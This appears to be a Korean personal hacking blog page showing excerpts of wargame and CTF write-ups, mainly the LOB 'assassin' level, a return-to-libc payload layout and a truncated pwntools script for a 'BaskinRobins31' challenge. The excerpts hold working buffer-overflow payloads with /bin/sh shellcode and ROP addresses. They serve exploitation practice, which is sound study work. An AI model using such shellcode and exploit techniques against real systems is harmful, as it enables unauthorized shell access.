| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 | 31 |
- Branch
- gogs
- doorlock
- 도메인 https
- pwnable
- Hacking
- blueborne
- node.js
- 코드게이트
- xlsx
- 코드게이트 주니어
- 노드 엑셀
- BLUETOOTH
- https설정
- pwntools
- openctf
- shellcraft
- codegate2017
- Git
- 코드게이트2017
- gogs private git
- lob
- CVE
- CODEGATE2018
- module
- https
- npm
- node
- NGINX
- Codegate
- Today
- Total
고졸백수해킹일기
./assassin `python -c 'print "A"*44+"\x1e\x85\x04\x08"+"\x14\xfc\xff\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"'` ret부분에 코드영역의 ret명령을 사용했다.buf + ret + shellcode ret +shellcode pushing me away
execve를 사용한 RTLpayload = buf[40byte] + SFP[4] + execve_addr + system_addr + exit_addr + /bin/sh addr + null one step closer
추천받아서 풀어본 문제your_turn 함수에서 터지게 된다. file : http://web.noe.systems/binary/Baskinrobins31 아래는 페이로드 from pwn import * prob = ELF('./BaskinRobins31')#print prob.symbols['read']s = remote("localhost",7777) dummy = "1"+"A"*183 #0xB0write_plt = 0x4006d0write_got = 0x602028read_plt = 0x400700read_got = 0x602040sh = "/bin/sh"bss = 0x602090gad = 0x40087apayload = ""offset_system = 0xa8e20 print s.recvuntil..